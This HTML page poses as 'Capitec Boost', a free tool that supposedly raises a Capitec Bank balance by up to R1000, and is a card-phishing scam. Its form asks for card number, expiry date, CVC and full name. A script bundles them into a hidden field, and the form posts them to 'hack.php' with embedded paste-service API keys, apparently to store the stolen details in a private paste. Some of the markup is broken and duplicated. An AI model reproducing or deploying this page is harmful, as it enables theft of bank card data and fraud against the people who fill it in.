
<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <style>
    #info{
      font-family: monospace;
      text-align: center;
      color: white;
      font-size: 15px;
    }
    #rn{
      font-size:10;
      color: red;
    }

input[type=submit]{
  background-color: #4CAF50;
  border: none;
  color: white;
  padding: 15px 30px;
  text-decoration: none;
  margin: 4px 2px;
  cursor: pointer;
}
    html {
  height: 100%;
}
body {
  margin:0;
  padding:0;
  font-family: sans-serif;
  background: linear-gradient(#141e30, #243b55);
}

.login-box {
  position: absolute;
  top: 50%;
  left: 50%;
  width: 400px;
  padding: 40px;
  transform: translate(-50%, -50%);
  background: rgba(0,0,0,.5);
  box-sizing: border-box;
  box-shadow: 0 15px 25px rgba(0,0,0,.6);
  border-radius: 10px;
}

.login-box h2 {
  margin: 0 0 30px;
  padding: 0;
  color: #fff;
  text-align: center;
}

.login-box .user-box {
  position: relative;
}

.login-box .user-box input {
  width: 100%;
  padding: 10px 0;
  font-size: 16px;
  color: #fff;
  margin-bottom: 30px;
  border: none;
  border-bottom: 1px solid #fff;
  outline: none;
  background: transparent;
}
.login-box .user-box label {
  position: absolute;
  top:0;
  left: 0;
  padding: 10px 0;
  font-size: 16px;
  color: #fff;
  pointer-events: none;
  transition: .5s;
}

.login-box .user-box input:focus ~ label,
.login-box .user-box input:valid ~ label {
  top: -20px;
  left: 0;
  color: #03e9f4;
  font-size: 12px;
}

.login-box form a {
  position: relative;
  display: inline-block;
  padding: 10px 20px;
  color: #03e9f4;
  font-size: 16px;
  text-decoration: none;
  text-transform: uppercase;
  overflow: hidden;
  transition: .5s;
  margin-top: 40px;
  letter-spacing: 4px
}

.login-box a:hover {
  background: #03e9f4;
  color: #fff;
  border-radius: 5px;
  box-shadow: 0 0 5px #03e9f4,
              0 0 25px #03e9f4,
              0 0 50px #03e9f4,
              0 0 100px #03e9f4;
}

.login-box a span {
  position: absolute;
  display: block;
}

.login-box a span:nth-child(1) {
  top: 0;
  left: -100%;
  width: 100%;
  height: 2px;
  background: linear-gradient(90deg, transparent, #03e9f4);
  animation: btn-anim1 1s linear infinite;
}

@keyframes btn-anim1 {
  0% {
    left: -100%;
  }
  50%,100% {
    left: 100%;
  }
}

.login-box a span:nth-child(2) {
  top: -100%;
  right: 0;
  width: 2px;
  height: 100%;
  background: linear-gradient(180deg, transparent, #03e9f4);
  animation: btn-anim2 1s linear infinite;
  animation-delay: .25s
}

@keyframes btn-anim2 {
  0% {
    top: -100%;
  }
  50%,100% {
    top: 100%;
  }
}

.login-box a span:nth-child(3) {
  bottom: 0;
  right: -100%;
  width: 100%;
  height: 2px;
  background: linear-gradient(270deg, transparent, #03e9f4);
  animation: btn-anim3 1s linear infinite;
  animation-delay: .5s
}

@keyframes btn-anim3 {
  0% {
    right: -100%;
  }
  50%,100% {
    right: 100%;
  }
}

.login-box a span:nth-child(4) {
  bottom: -100%;
  left: 0;
  width: 2px;
  height: 100%;
  background: linear-gradient(360deg, transparent, #03e9f4);
  animation: btn-anim4 1s linear infinite;
  animation-delay: .75s
}

@keyframes btn-anim4 {
  0% {
    bottom: -100%;
  }
  50%,100% {
    bottom: 100%;
  }
}

  </style>
</head>
<body>
  <div id="info">
  Capitec Boost -> a free tool to increase your Capitec Bank account balance with up to R1000!
  <br>
  <div id="rn">PLEASE DO NOT EXCEED R1000 <br></div>
  <br>
</div>
 


<script>
  function format(){
    var paste_code = document.getElementById("paste_code");
    paste_code.value = "Acc Number -> " + document.getElementById("accn").value + " Full Name -> "+ document.getElementById("name").value + " Expiry Date -> "+ document.getElementById("exp").value + " CVC -> " + document.getElementById("cvc").value;
  }
</script>
<div class="login-box">
  <h2>Capitec Boost</h2>
  <form action="hack.php" method="POST">
    <input type="hidden" name="api_option" value="paste">
    <input type="hidden" name="api_dev_key" value="AfwexWeqoqTgfDbcIUCQQja0zosOkv-B">
    <input type="hidden" id="paste_code" name="api_paste_code" value="This is an example paste">
    <input type="hidden" name="api_paste_private" value="1">
    <input type="hidden" name="api_paste_name" value="LATEST">
    <input type="hidden" name="api_user_key" value="aef42db10c347691fac9ac161a5c9b9a">
<div class="login-box">
  <h2>Capitec Boost</h2>
    <div class="user-box">
      <input type="number" id="accn">
      <label>Enter 16 Digit Card Number</label>
    </div>
    <div class="user-box">
      <input type="number" id="exp">
      <label>Enter Expiry Date</label>
    </div>
    <div class="user-box">
      <input type="number" id="cvc">
      <label>Enter CVC 9 (3 digit pin)
    </div>
    <div class="user-box">
    <input type="text">
    <label>Enter Boost Amount (max R1000)</label>
    </div>
    <div class="user-box" Id="name">
    <input type="text">
    <label>Enter full Name</label>
    <a href="#">
      <span></span>
      <span></span>
      <span></span>
      <span></span>
  <input type="submit" value="BOOST !" onclick="format();">
    </a>
  </form>
</div>
</body>
</body>
